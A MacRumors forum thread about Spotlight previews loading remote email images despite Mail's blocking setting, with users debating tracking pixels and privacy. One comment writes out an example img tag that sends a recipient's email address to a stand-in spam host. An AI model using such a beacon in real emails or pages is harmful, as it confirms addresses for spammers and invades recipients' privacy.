Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.
I never left Alfred. Spotlight sucks. With Alfred, I can simply type FIND, OPEN, or IN, and I can either find the file I want, open the file I want, or search inside the file I want (plus lots of other cool stuff).

I've done the exact same search with Alfred and Spotlight and I find what I'm looking for about 10x faster with Alfred. I use Cocktail to hide that Spotlight icon and use COMMAND-SPACE for Alfred. Works like a charm.

I was optimistic after watching the Spotlight demo during the Apple keynote, but Alfred is just so fast and supports doing some pretty fancy stuff. Oh Alfred how I've missed you!
 
Security issues in OSX and iOS don't bother me at all, as long as the device I am using is The Thinnest One Ever Made By Apple.
 
The only thing that bothers me is that it comes with a lot of stuff allowed when you first install it. It's all "important" for the OS to run smoothly. I wonder how much of that stuff could really be blocked, or how much stuff is getting through those holes? There is so much crap going on behind our backs...I'm SO glad Apple is SO concerned about our privacy. Pfft.

I'm not familiar with those presets you mention. I've been running it since version 1 so perhaps it's kept all of my original settings. You don't really have to 'wonder' what's getting out - just monitor your network. I'm going to go out on a limb and suggest that YOU should primarily be concerned with your privacy, as easy as it is to vilify apple or any other company for that matter.
 
I miss Steve

He might have gotten bad press for his dedication to perfection, but in fact, this is what made OS X great, and eventually the dragon slayer of Microsoft in the foible department.
Now we've got a mountain of snafus to point to, makes you go hmmmm......
Please, programmers, stop rushing to get crap out the door.
You have opened beta testing to the masses, use the data retrieved wisely.
 
I supposed Apple hired a bunch of programmers recently.

I wish they did. Apple doesn't have nearly enough programmers, it seems or they wouldn't have such buggy software all the time. Now they're trying to have one year cycles for OS X and iOS both. It's not working out too well for them, IMO. I hear stories of constantly shuffling people around that know what they're doing so they can fix this and that, but that leaves other people finishing the work they started, etc. I believe Scott Forestall quit due to this sort of treatment (the "Maps" thing being a direct result of people quitting and people being shuffled) and that IS a shame since Ive doesn't know WTF he's doing when it comes to software, IMO.
 
What's a spammer going to do with your IP address and OS details? Every web site you visit gets this information. How is this even a concern or story? If you are so paranoid that you don't even want people to know your general location or what OS you are running, you shouldn't be connected to the outside world at all.
 
aren't most of these so called troublesome emails meant to be in the spam/junk mail folder anyway?

just have spotlight ignore the junk folder

Or just have spotlight check your html e-mail load settings prior to searching through your e-mails and loading the spam images (confirming you are a valid e-mail address to the bad guys).

The Spotlight folks just missed this in their requirements - probably won't be too terrible to fix it...course that's the thing, Apple needs to fix this not ignore it, since its a privacy related thing I would guess they will.
 
Right On

What's a spammer going to do with your IP address and OS details? Every web site you visit gets this information. How is this even a concern or story? If you are so paranoid that you don't even want people to know your general location or what OS you are running, you shouldn't be connected to the outside world at all.


IP Address? What IP address the one of my router, really. Why is this even a story. OS details whatever. So a guy at this IP has this OS version. Let's target him, blah blah blah. What a dumb story, more FUD. Now if the a$$holes said that they could run something triggered by the SpotLight indexing it would be a story. Move on, nothing to see here.
 
aren't tracking pixels relevant only in spam emails? and you have to open the email for them to work right?
 
What's a spammer going to do with your IP address and OS details? Every web site you visit gets this information. How is this even a concern or story? If you are so paranoid that you don't even want people to know your general location or what OS you are running, you shouldn't be connected to the outside world at all.

I'm sure a lot of websites you visit have some content being loaded by something that gives info to a spammer. Enable the Safari status bar, disable AdBlock, and see how many random domains you connect to just to load a simple blog somewhere.
 
tutorial:

delete yosemite

end of tutorial.

Does this only affect Yosemite? The article didn't say anything. Spotlight searches Mail messages in some earlier versions of OS X too, I think even Tiger.

----------

Well, you should (also on your iOS devices, BTW). Many other email clients have this setting enabled by default.
You can still download the images for individual mails by clicking a button. They just don't get downloaded automatically for every email.

I remember enabling remote images because I kept getting non-spam emails that contained them. I got zero spam until my mom gave my email address out to some stupid websites, and I still hardly get any.
 
You know I'm shocked people have complaints about the mail app for OS X. I always thought it was pretty decent. easy to set up and use.
 
And I'm sure that the NSA knew about this one months ago...

----------

You know I'm shocked people have complaints about the mail app for OS X. I always thought it was pretty decent. easy to set up and use.

Not having wadded through the earlier posts, this 'bug' seems to involve Spotlight, more than Mail, correct?

Mail has been flaky for me. Anything involving filtering, and it seems to have a mind of its own.
 
Good to know, and worth fixing.

But as a heavy Spotlight user and mail-searcher for years, I don't think I have EVER quick-looked a spam message.

You might by accident, but it's definitely what I'd call an edge case. Spam messages aren't likely to look (by title) like the thing you were searching for, so you won't need to quicklook them.

I'll try to contain my panic.

You know I'm shocked people have complaints about the mail app for OS X. I always thought it was pretty decent. easy to set up and use.

It is, for most people, but experiences vary and people have a million different complex email needs. Apple Mail has been excellent for me! The filters especially have been a lifesaver. Color codes and special sounds and auto-filing galore!

I do know it had bad spell around a year ago for GMail users: Google doesn't follow normal email standards (which isn't a criticism: GMail is meant to be different) and Apple's attempt to improve how that was handled did not go smoothly. But it was addressed, and GMail seems fine now through Apple Mail: most of the mail I get is through Google in fact.
 
Another reason not to use the crappy mail app. Now I know why I have always stuck to using the webmail interface.

Will Apple ever get their act together and overhaul the damn app and actually make it usable?

From this report, it seems that the glitch is with Spotlight, not with Mail.app, at least not directly. Mail might be providing a Spotlight plugin, and that plugin may need to be fixed, but the app itself doesn't suffer from this vulnerability, or am I misreading something?

Mail.app has been the best mail client that I've used in the past 10 years. I'm not saying it's always been perfect, but compared to the painful experience of supporting clients using the myriad of Outlook/Express versions, my Mail experience has been fantastic and virtually flawless.

I frequently have 6 to 12 IMAP-based accounts setup in my Mail.app at one time, and except for a few connection problems here and there, solved with some patience and reboot of the app, it's been a pleasure to use.

----------

IP Address? What IP address the one of my router, really. Why is this even a story. OS details whatever. So a guy at this IP has this OS version. Let's target him, blah blah blah. What a dumb story, more FUD. Now if the a$$holes said that they could run something triggered by the SpotLight indexing it would be a story. Move on, nothing to see here.

It's about data collection and correlation. Your public IP address (WAN address, not internal LAN address) quite often reveals the your geographic area in the world, so they can use that data to build analysis reports of which geographic areas in the world are most effective to be targeted. This also ties back to web advertising campaigns, which can be geographically targeted. So you may receive a spam message, they get your IP address, determine your location, and then you start seeing web ads as a result. It's all about the data.
 
That is actually very untrue. The majority of the spam computers that send out those spam emails have no way of monitoring your specific email account. They don't track if the email is valid, either. If they get a bounce back saying the email doesn't exist, they still continue to send repeated emails. They also aren't going to waste the time calculating "if you opened your email and read the ad", they're going to send you continual ads regardless.

Scam pixels are often used just for overall statistics, like "20% of the people we send ads to are in this part of the world using this version of OS X".
That's not true; as others have pointed out, many spammers prefer to use lists of "confirmed" e-mail addresses, which sell for much higher prices.

This would also require that a DIFFERENT version of the spam pixel is loaded for each email, so they could uniquely target each person they send the email to. It's much more cost-efficient to just send out mass emails, rather than track each of the millions of emails individually.
Not at all. You can do it quite trivially with only one spam pixel image, like this:

<img src="http://myevilspamsite.com/spam_pixel.jpg?address=johndoe@whatever.com" />

Then, using the same software that they use to put "Hello johndoe," at the top of the emails they send you, they can simply swap the appropriate address into the img tag. Voilà; one image, verifying millions of addresses.

Bottom line: loading images should be turned off for security reasons, and it's pretty bad if Spotlight is ignoring that setting.
 
If I understood the article correctly it comes across as needlessly confusing.

So in short, Apple Mail has an option that prevents remote loading of images in email (unless you specifically request them). This is a handy thing to do as spammers can track whether you've received an email by embedding and effectively invisible image in the email they send you. When you open the email the image is requested from the remote server providing confirmation and your IP address (which can be referenced against other sales databases for targeted marketing).

You should enable that feature in your email client.

Whether you have or have not done this in Apple Mail, though—what does that have to do with the Spotlight bug? What is said here is that when you open the email in spotlight (all you have to do is *click* on the email name, but if you don't do that it shouldn't open the email) it will not honor that setting from Apple Mail (as it should). The data would still be returned if you haven't set this feature up in Apple Mail.

So for now, if this is something you have taken steps to protect against, don't click on those emails or disable indexing of email from Spotlight until Apple (hopefully) fixes the issue. In either case, it's a bummer of a move for people who know enough to have kept an email address relatively or completely spam free and use Spotlight to browse email addresses, but contrary to what a few have suggested, I can think of much bigger security issues or bugs that have cropped up in recent history.

This relevant to the discussion?

https://fix-macosx.com

:rolleyes:
Not really?

And depends on how paranoid someone wants to be (or has actual reason to be).
 
Dumb question, though perhaps the article should've said this, but is this unique to Yosemite or are other versions affected? It sounds like it's unique to Yosemite, but further clarification here would be great.

Using Mavericks, I can answer a "yes" to this. It's easy to tell - if you have remote image display off in Mail.app, then you know how a, for example, Target.com or Apple.com e.mail looks with images off. When you search in Spotlight on the Mac, for something like the subject of an e.mail from Target/Apple, it will list the subject, and if you hover your mouse over it, to the left of it, a preview of the e.mail is generated. In this preview, the remote images are displayed.

Something to note - *usually* remote images are used by legit marketers - e.g.: you signed up with Target, perhaps, after you ordered something from them, so you opted into their weekly e.mails. They want to know who's picking up those e.mails and what they are clicking on and what mail clients are being used [which can be useful - that way they make sure to test their HTML e.mails with mail clients that people are using]. If you didn't want this weekly e.mail, you click an 'unsubscribe' link, and it is honored.

A typical spammer gets your address via means that are not by permission and there is no legit unsubscribe link. In fact, sometimes if one is included, it is a baited website that simply confirms you have a valid address and then that address is added to a list of known good addresses and sold to spammers.

What Apple should do is what many other MUAs have done [Mail User Agents]. Make it so if you whitelist an address [eg: adding the Target address to your address book], the remote images will display. But if you get an e.mail from an unknown address, it won't display. Or at least give users that option. I don't mind allowing some legit organizations know that I opened their e.mail and am using a Mac and all that; but I certainly don't want to inform a Russian bride website that the address they sent a message to is valid; they may not take me off of their list, but at least my address won't be added to more lists!

/vjl/
 
You know I'm shocked people have complaints about the mail app for OS X. I always thought it was pretty decent. easy to set up and use.

I had endless problems getting Mail to check the mail immediately after pressing the get mail button. This started back when they even acknowledged a problem with getting mail. Their fix improved things (it would eventually auto-check the mail after it instead of sitting there for days not checking it unless I exited and restarted). But it would still not reliably check the mail immediately after pressing that button so I switched to Thunderbird that would. The other problem is that Apple won't update their apps anymore unless you upgrade the entire OS. You used to at least get updates for a few versions after a new OS X version would come out. Now they use updates as leverage to try and push you into upgrading to Yosemite (and whatever comes after, etc.) That is simply unacceptable, IMO. The same is true of Safari.
 
Or just have spotlight check your html e-mail load settings prior to searching through your e-mails and loading the spam images (confirming you are a valid e-mail address to the bad guys).

The Spotlight folks just missed this in their requirements - probably won't be too terrible to fix it...course that's the thing, Apple needs to fix this not ignore it, since its a privacy related thing I would guess they will.

Well no cause some of us like to remote load images. We want to see those. Just not the ones we filtered/rules into junk or deleted. So spotlight would also need to read the rules we set as well to see if we have set a rule to delete certain emails.
 
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.